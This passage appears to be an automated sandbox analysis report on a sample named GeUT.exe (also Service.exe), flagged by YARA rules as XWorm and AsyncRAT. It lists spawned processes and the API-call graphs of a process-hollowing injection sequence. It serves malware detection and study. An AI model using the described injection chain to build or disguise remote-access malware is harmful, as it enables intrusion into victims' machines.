                    Imagebase:0x3b0000
                    File size:59'904 bytes
                    MD5 hash:7284765CA4D2F85C487796F437B01822
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:false

                    Target ID:4
                    Start time:03:17:14
                    Start date:01/10/2024
                    Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                    Imagebase:0xf10000
                    File size:59'904 bytes
                    MD5 hash:7284765CA4D2F85C487796F437B01822
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                    Reputation:low
                    Has exited:true

                    Target ID:5
                    Start time:03:17:15
                    Start date:01/10/2024
                    Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                    Imagebase:0xb70000
                    File size:59'904 bytes
                    MD5 hash:7284765CA4D2F85C487796F437B01822
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000005.00000002.2282391567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000005.00000002.2282391567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                    Reputation:low
                    Has exited:true

                    Target ID:6
                    Start time:03:17:15
                    Start date:01/10/2024
                    Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                    Imagebase:0x2b0000
                    File size:59'904 bytes
                    MD5 hash:7284765CA4D2F85C487796F437B01822
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:true

                    Target ID:7
                    Start time:03:17:15
                    Start date:01/10/2024
                    Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                    Imagebase:0x740000
                    File size:59'904 bytes
                    MD5 hash:7284765CA4D2F85C487796F437B01822
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:true

                    Target ID:8
                    Start time:03:17:15
                    Start date:01/10/2024
                    Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                    Imagebase:0x120000
                    File size:59'904 bytes
                    MD5 hash:7284765CA4D2F85C487796F437B01822
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:true

                    Target ID:9
                    Start time:03:17:15
                    Start date:01/10/2024
                    Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                    Imagebase:0x7b0000
                    File size:59'904 bytes
                    MD5 hash:7284765CA4D2F85C487796F437B01822
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:true

                    Target ID:11
                    Start time:03:17:23
                    Start date:01/10/2024
                    Path:C:\Users\user\AppData\Roaming\Service.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Roaming\Service.exe"
                    Imagebase:0x4c0000
                    File size:59'904 bytes
                    MD5 hash:7284765CA4D2F85C487796F437B01822
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 100%, Joe Sandbox ML
                    Reputation:low
                    Has exited:true

                    Target ID:12
                    Start time:03:17:23
                    Start date:01/10/2024
                    Path:C:\Users\user\AppData\Roaming\Service.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Roaming\Service.exe"
                    Imagebase:0xb10000
                    File size:59'904 bytes
                    MD5 hash:7284765CA4D2F85C487796F437B01822
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:true

                    Target ID:13
                    Start time:03:17:23
                    Start date:01/10/2024
                    Path:C:\Users\user\AppData\Roaming\Service.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Roaming\Service.exe"
                    Imagebase:0x5b0000
                    File size:59'904 bytes
                    MD5 hash:7284765CA4D2F85C487796F437B01822
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:14
                    Start time:03:17:23
                    Start date:01/10/2024
                    Path:C:\Users\user\AppData\Roaming\Service.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Roaming\Service.exe"
                    Imagebase:0x290000
                    File size:59'904 bytes
                    MD5 hash:7284765CA4D2F85C487796F437B01822
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:15
                    Start time:03:17:23
                    Start date:01/10/2024
                    Path:C:\Users\user\AppData\Roaming\Service.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Roaming\Service.exe"
                    Imagebase:0xc20000
                    File size:59'904 bytes
                    MD5 hash:7284765CA4D2F85C487796F437B01822
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:16
                    Start time:03:17:23
                    Start date:01/10/2024
                    Path:C:\Users\user\AppData\Roaming\Service.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Roaming\Service.exe"
                    Imagebase:0xcb0000
                    File size:59'904 bytes
                    MD5 hash:7284765CA4D2F85C487796F437B01822
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:17
                    Start time:03:17:31
                    Start date:01/10/2024
                    Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                    Imagebase:0x490000
                    File size:59'904 bytes
                    MD5 hash:7284765CA4D2F85C487796F437B01822
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:18
                    Start time:03:17:31
                    Start date:01/10/2024
                    Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                    Imagebase:0xee0000
                    File size:59'904 bytes
                    MD5 hash:7284765CA4D2F85C487796F437B01822
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:19
                    Start time:03:17:31
                    Start date:01/10/2024
                    Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                    Imagebase:0xee0000
                    File size:59'904 bytes
                    MD5 hash:7284765CA4D2F85C487796F437B01822
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:20
                    Start time:03:17:31
                    Start date:01/10/2024
                    Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                    Imagebase:0xad0000
                    File size:59'904 bytes
                    MD5 hash:7284765CA4D2F85C487796F437B01822
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:21
                    Start time:03:17:31
                    Start date:01/10/2024
                    Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                    Imagebase:0xd80000
                    File size:59'904 bytes
                    MD5 hash:7284765CA4D2F85C487796F437B01822
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:22
                    Start time:03:17:31
                    Start date:01/10/2024
                    Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                    Imagebase:0xa50000
                    File size:59'904 bytes
                    MD5 hash:7284765CA4D2F85C487796F437B01822
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:24
                    Start time:03:17:39
                    Start date:01/10/2024
                    Path:C:\Users\user\AppData\Roaming\Service.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Roaming\Service.exe"
                    Imagebase:0x3e0000
                    File size:59'904 bytes
                    MD5 hash:7284765CA4D2F85C487796F437B01822
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:25
                    Start time:03:17:39
                    Start date:01/10/2024
                    Path:C:\Users\user\AppData\Roaming\Service.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Roaming\Service.exe"
                    Imagebase:0x390000
                    File size:59'904 bytes
                    MD5 hash:7284765CA4D2F85C487796F437B01822
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:26
                    Start time:03:17:39
                    Start date:01/10/2024
                    Path:C:\Users\user\AppData\Roaming\Service.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Roaming\Service.exe"
                    Imagebase:0xd90000
                    File size:59'904 bytes
                    MD5 hash:7284765CA4D2F85C487796F437B01822
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:27
                    Start time:03:17:39
                    Start date:01/10/2024
                    Path:C:\Users\user\AppData\Roaming\Service.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Roaming\Service.exe"
                    Imagebase:0x490000
                    File size:59'904 bytes
                    MD5 hash:7284765CA4D2F85C487796F437B01822
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:28
                    Start time:03:17:39
                    Start date:01/10/2024
                    Path:C:\Users\user\AppData\Roaming\Service.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Roaming\Service.exe"
                    Imagebase:0x880000
                    File size:59'904 bytes
                    MD5 hash:7284765CA4D2F85C487796F437B01822
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:29
                    Start time:03:17:39
                    Start date:01/10/2024
                    Path:C:\Users\user\AppData\Roaming\Service.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Roaming\Service.exe"
                    Imagebase:0xf20000
                    File size:59'904 bytes
                    MD5 hash:7284765CA4D2F85C487796F437B01822
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Reset < >

                      Execution Graph

                      Execution Coverage:16%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:0%
                      Total number of Nodes:18
                      Total number of Limit Nodes:2
                      execution_graph 2726 c91ec8 2727 c91f3b Wow64SetThreadContext 2726->2727 2728 c91f26 2726->2728 2729 c91f84 2727->2729 2728->2727 2730 c91fd8 ReadProcessMemory 2731 c92097 2730->2731 2732 c91ba8 2733 c91baa CreateProcessW 2732->2733 2735 c91d8e 2733->2735 2735->2735 2736 c921f8 2737 c92261 2736->2737 2738 c92276 WriteProcessMemory 2736->2738 2737->2738 2739 c922d8 2738->2739 2740 c92338 ResumeThread 2741 c923c0 2740->2741 2742 c920f0 2743 c920f2 VirtualAllocEx 2742->2743 2744 c921a7 2743->2744

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 c90d30-c90d71 1 c90d78-c90f15 0->1 2 c90d73 0->2 9 c90f42-c90f87 call c907a4 1->9 10 c90f17-c90f41 1->10 2->1 14 c90f89-c90fa4 9->14 15 c90faf-c91013 9->15 10->9 14->15 21 c9101a-c91046 15->21 22 c91015 15->22 24 c91048-c91055 call c907b0 21->24 25 c910a6-c910d8 call c907bc 21->25 22->21 29 c9105a-c9107a 24->29 30 c910da-c910f5 25->30 31 c91100 25->31 32 c9107c-c91097 29->32 33 c910a2-c910a4 29->33 30->31 34 c91101-c9110b 31->34 32->33 33->34 36 c9110d 34->36 37 c91112-c91158 call c907c8 34->37 36->37 43 c9115a-c91175 37->43 44 c91180-c91199 37->44 43->44 45 c9119b-c911c7 call c907d4 44->45 46 c911f0-c91259 call c907e0 44->46 52 c911c9-c911e4 45->52 53 c911ef 45->53 58 c9125b-c9126c 46->58 59 c9126e-c91270 46->59 52->53 53->46 61 c91276-c9128a 58->61 59->61 62 c9128c-c912a9 call c907e0 61->62 63 c912be-c912d5 61->63 68 c912ae-c912bd 62->68 65 c912fd-c91332 call c907ec 63->65 66 c912d7-c912f2 63->66 71 c9135a-c9138c 65->71 72 c91334-c9134f 65->72 66->65 68->63 76 c914cd-c914ec 71->76 72->71 77 c91391-c9140c 76->77 78 c914f2-c91546 call c907ec 76->78 89 c914c2-c914c7 77->89 90 c91412-c91474 call c907ec 77->90 85 c91548-c91563 78->85 86 c9156e-c9159b 78->86 85->86 92 c9159d-c915a0 86->92 93 c915a3-c915b3 86->93 89->76 105 c91479-c91499 90->105 92->93 94 c915ba-c915e5 93->94 95 c915b5 93->95 100 c91645-c91677 call c90804 94->100 101 c915e7-c915f4 call c907f8 94->101 95->94 110 c91679-c91694 100->110 111 c9169f 100->111 107 c915f9-c91619 101->107 108 c9149b-c914b6 105->108 109 c914c1 105->109 112 c9161b-c91636 107->112 113 c91641-c91643 107->113 108->109 109->89 110->111 114 c916a0-c916a6 call c90810 111->114 112->113 113->114 119 c916ab-c916cb 114->119 121 c916cd-c916e8 119->121 122 c916f3-c91785 119->122 121->122
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.2147328728.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_c90000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID: (
                      • API String ID: 0-3887548279
                      • Opcode ID: 4eff746a542a405d55b2c9b63ca77c7e1170d494ffd313ef28b37af664bb8f2e
                      • Instruction ID: a748b5c5a575da293fc462d08f8eeac7ebc04d29284dc8533b4d06241533101e
                      • Opcode Fuzzy Hash: 4eff746a542a405d55b2c9b63ca77c7e1170d494ffd313ef28b37af664bb8f2e
                      • Instruction Fuzzy Hash: 5F52D074E012298FDB68DF65C945BEDB7B2BF89300F2481EAD509AB295DB345E84CF40

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 129 c91b9c-c91ba6 131 c91ba8-c91ba9 129->131 132 c91baa-c91c33 129->132 131->132 133 c91c4a-c91c58 132->133 134 c91c35-c91c47 132->134 135 c91c5a-c91c6c 133->135 136 c91c6f-c91cab 133->136 134->133 135->136 137 c91cad-c91cbc 136->137 138 c91cbf-c91d8c CreateProcessW 136->138 137->138 142 c91d8e-c91d94 138->142 143 c91d95-c91e54 138->143 142->143 153 c91e8a-c91e95 143->153 154 c91e56-c91e7f 143->154 158 c91e96 153->158 154->153 158->158
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00C91D79
                      Memory Dump Source
                      • Source File: 00000002.00000002.2147328728.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_c90000_GeUT.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: e17935d66087fb1200cc4f97d79e2bad85d7e884cf3baa9fb3022ab93c5eb66d
                      • Instruction ID: 5431277e6af787fa67819e8e4ae10deac06710eb97a073772a062011ebc37c34
                      • Opcode Fuzzy Hash: e17935d66087fb1200cc4f97d79e2bad85d7e884cf3baa9fb3022ab93c5eb66d
                      • Instruction Fuzzy Hash: 2481D274C00229DFDF21CFA9C944BEDBBB5BB49300F1491AAE508B7260DB709A89CF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 159 c91ba8-c91c33 161 c91c4a-c91c58 159->161 162 c91c35-c91c47 159->162 163 c91c5a-c91c6c 161->163 164 c91c6f-c91cab 161->164 162->161 163->164 165 c91cad-c91cbc 164->165 166 c91cbf-c91d8c CreateProcessW 164->166 165->166 170 c91d8e-c91d94 166->170 171 c91d95-c91e54 166->171 170->171 181 c91e8a-c91e95 171->181 182 c91e56-c91e7f 171->182 186 c91e96 181->186 182->181 186->186
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00C91D79
                      Memory Dump Source
                      • Source File: 00000002.00000002.2147328728.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_c90000_GeUT.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: 3bc47c6dbb889d2e2871b43f328d1c0b1a6cad33a00dace12117b77a024f4121
                      • Instruction ID: 883db0951abcd91f544d842156e2799322dbfdd207ff327ecffe8df8273b9068
                      • Opcode Fuzzy Hash: 3bc47c6dbb889d2e2871b43f328d1c0b1a6cad33a00dace12117b77a024f4121
                      • Instruction Fuzzy Hash: 8D81C274C00269DFDF21CFA9C944BEDBBB5BB49300F1491AAE509B7250DB709A89CF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 187 c921f0-c9225f 189 c92261-c92273 187->189 190 c92276-c922d6 WriteProcessMemory 187->190 189->190 191 c922d8-c922de 190->191 192 c922df-c9231d 190->192 191->192
                      APIs
                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00C922C6
                      Memory Dump Source
                      • Source File: 00000002.00000002.2147328728.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_c90000_GeUT.jbxd
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID:
                      • API String ID: 3559483778-0
                      • Opcode ID: 55f195101c82ca0194e137da207c373a8ef3bcb0f683f305ed8dd9d12e33db95
                      • Instruction ID: da2bbd8393bd521dd551bd0037956e168b7113cab2bd0bfb24ecfaa8419785f4
                      • Opcode Fuzzy Hash: 55f195101c82ca0194e137da207c373a8ef3bcb0f683f305ed8dd9d12e33db95
                      • Instruction Fuzzy Hash: F64197B5D04258DFCF00CFA9D984AEEFBF1BB49310F24902AE818B7210D374AA45CB64

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 195 c921f8-c9225f 196 c92261-c92273 195->196 197 c92276-c922d6 WriteProcessMemory 195->197 196->197 198 c922d8-c922de 197->198 199 c922df-c9231d 197->199 198->199
                      APIs
                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00C922C6
                      Memory Dump Source
                      • Source File: 00000002.00000002.2147328728.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_c90000_GeUT.jbxd
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID:
                      • API String ID: 3559483778-0
                      • Opcode ID: 13cad3dd1af164a5b2177896d42ebb54245dca285f0d95717373e6c5f7f70fbd
                      • Instruction ID: b2f7af4051fb9de76481933fdbdfae8eb56ebd227ba87d0e56ac2944b2c14d1b
                      • Opcode Fuzzy Hash: 13cad3dd1af164a5b2177896d42ebb54245dca285f0d95717373e6c5f7f70fbd
                      • Instruction Fuzzy Hash: B24166B9D04258DFCF00CFA9D984ADEFBF5BB49314F24902AE818B7210D375AA45CB64

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 202 c91fd0-c92095 ReadProcessMemory 204 c9209e-c920dc 202->204 205 c92097-c9209d 202->205 205->204
                      APIs
                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00C92085
                      Memory Dump Source
                      • Source File: 00000002.00000002.2147328728.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_c90000_GeUT.jbxd
                      Similarity
                      • API ID: MemoryProcessRead
                      • String ID:
                      • API String ID: 1726664587-0
                      • Opcode ID: 6f677e1882cc3849af2f5bd91213fe6f6e206026a8fc922f978225aed7fe3d24
                      • Instruction ID: 9434603ab41b30744a0e6bd568301e919e959a2f2ec20c848d962652e4ef54b7
                      • Opcode Fuzzy Hash: 6f677e1882cc3849af2f5bd91213fe6f6e206026a8fc922f978225aed7fe3d24
                      • Instruction Fuzzy Hash: E34199B9D04258DFCF10CFAAD984ADEFBB1BB19310F14A02AE814B7210D375A945CF64

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 208 c920e8-c920ee 209 c920f0-c920f1 208->209 210 c920f2-c921a5 VirtualAllocEx 208->210 209->210 211 c921ae-c921e4 210->211 212 c921a7-c921ad 210->212 212->211
                      APIs
                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00C92195
                      Memory Dump Source
                      • Source File: 00000002.00000002.2147328728.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_c90000_GeUT.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: f0fe96cf4713f8740e7c309517af5c66bcec861096a89d9e05a0b96ebde0432b
                      • Instruction ID: 9c9623d6dda418774a3c44fee6d0c93dbf11b3306e5731c704cff3d43b24e080
                      • Opcode Fuzzy Hash: f0fe96cf4713f8740e7c309517af5c66bcec861096a89d9e05a0b96ebde0432b
                      • Instruction Fuzzy Hash: B03178B9D04258AFCF10CFA9D984ADEFBB5BB49310F10A01AE914B7310D375A915CF64

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 215 c91fd8-c92095 ReadProcessMemory 216 c9209e-c920dc 215->216 217 c92097-c9209d 215->217 217->216
                      APIs
                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00C92085
                      Memory Dump Source
                      • Source File: 00000002.00000002.2147328728.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_c90000_GeUT.jbxd
                      Similarity
                      • API ID: MemoryProcessRead
                      • String ID:
                      • API String ID: 1726664587-0
                      • Opcode ID: e1f290a4f09d53d3dadb11232562064b42f12ba3034b0921dcdb51ef28bdc44a
                      • Instruction ID: a6378e10c55d326b949e2d8580d22848e62cc0536993582b2e0e67382a20c83a
                      • Opcode Fuzzy Hash: e1f290a4f09d53d3dadb11232562064b42f12ba3034b0921dcdb51ef28bdc44a
                      • Instruction Fuzzy Hash: C43167B9D04258DFCF10CFAAD984ADEFBB5BB19310F20A06AE814B7210D375A945CF64

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 220 c920f0-c921a5 VirtualAllocEx 222 c921ae-c921e4 220->222 223 c921a7-c921ad 220->223 223->222
                      APIs
                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00C92195
                      Memory Dump Source
                      • Source File: 00000002.00000002.2147328728.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_c90000_GeUT.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 5547ad5f928f202a71656acfb4c2b78f36ddb80e705b091f0c04bb5654ee7fb8
                      • Instruction ID: 71909664f59c0a7745e145ab7f13f88dfc4dfa999e78a324946f9fc650aa92f8
                      • Opcode Fuzzy Hash: 5547ad5f928f202a71656acfb4c2b78f36ddb80e705b091f0c04bb5654ee7fb8
                      • Instruction Fuzzy Hash: 5C3155B9D042589FCF10CFA9D984A9EFBB5BB09310F10A02AE914B7310D375A955CF65

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 233 c91ec8-c91f24 234 c91f3b-c91f82 Wow64SetThreadContext 233->234 235 c91f26-c91f38 233->235 236 c91f8b-c91fc3 234->236 237 c91f84-c91f8a 234->237 235->234 237->236
                      APIs
                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 00C91F72
                      Memory Dump Source
                      • Source File: 00000002.00000002.2147328728.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_c90000_GeUT.jbxd
                      Similarity
                      • API ID: ContextThreadWow64
                      • String ID:
                      • API String ID: 983334009-0
                      • Opcode ID: 1b87012b01d1dea9bc70b01d9f0392c3cce4646caa17a0df396992969f135b61
                      • Instruction ID: e009e33fa600ea69c0ff2dbfcab48c00d9609d896ea4465d625fd17eab20a696
                      • Opcode Fuzzy Hash: 1b87012b01d1dea9bc70b01d9f0392c3cce4646caa17a0df396992969f135b61
                      • Instruction Fuzzy Hash: E1319AB5D012599FCF10CFAAD984ADEFBF1BB49314F24906AE814B7210D378AA45CF64

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 226 c91ec1-c91f24 227 c91f3b-c91f82 Wow64SetThreadContext 226->227 228 c91f26-c91f38 226->228 229 c91f8b-c91fc3 227->229 230 c91f84-c91f8a 227->230 228->227 230->229
                      APIs
                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 00C91F72
                      Memory Dump Source
                      • Source File: 00000002.00000002.2147328728.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_c90000_GeUT.jbxd
                      Similarity
                      • API ID: ContextThreadWow64
                      • String ID:
                      • API String ID: 983334009-0
                      • Opcode ID: 8a095e5c11c8e9469057570777be985f8578784f40d1846bf917df52de6f5111
                      • Instruction ID: 4f73957cc9f4facaf1e242181921426888d0ba34d59c651cfb53e53906c72f27
                      • Opcode Fuzzy Hash: 8a095e5c11c8e9469057570777be985f8578784f40d1846bf917df52de6f5111
                      • Instruction Fuzzy Hash: EB31CAB5D012599FCF10CFAAD884ADEFBF1BB49314F24806AE818B7250C378AA45CF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 240 c92331-c923be ResumeThread 242 c923c0-c923c6 240->242 243 c923c7-c923f5 240->243 242->243
                      APIs
                      • ResumeThread.KERNELBASE(?), ref: 00C923AE
                      Memory Dump Source
                      • Source File: 00000002.00000002.2147328728.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_c90000_GeUT.jbxd
                      Similarity
                      • API ID: ResumeThread
                      • String ID:
                      • API String ID: 947044025-0
                      • Opcode ID: d8b70ed4957dc903d0b93ac1f66ac64701587d49adc8d1e79fa1575ffffcc13e
                      • Instruction ID: 1909a95ffb785b4c6ec14cdd709c5300a590e8980837d35c0059572218879a7f
                      • Opcode Fuzzy Hash: d8b70ed4957dc903d0b93ac1f66ac64701587d49adc8d1e79fa1575ffffcc13e
                      • Instruction Fuzzy Hash: 742188B9D002199FCB10CFA9D884ADEFBB4BB49314F24901AE915B7310D375A945CFA4

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 246 c92338-c923be ResumeThread 247 c923c0-c923c6 246->247 248 c923c7-c923f5 246->248 247->248
                      APIs
                      • ResumeThread.KERNELBASE(?), ref: 00C923AE
                      Memory Dump Source
                      • Source File: 00000002.00000002.2147328728.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_c90000_GeUT.jbxd
                      Similarity
                      • API ID: ResumeThread
                      • String ID:
                      • API String ID: 947044025-0
                      • Opcode ID: f48ff16c43f81c8154e1fb3c263db4ac8d8ddab2415d4e18da98f0a58a0559ff
                      • Instruction ID: 8b39580e6e65de935dd769e55a694e688a3f7bf9ae57c13dd2f95a0b44095d8d
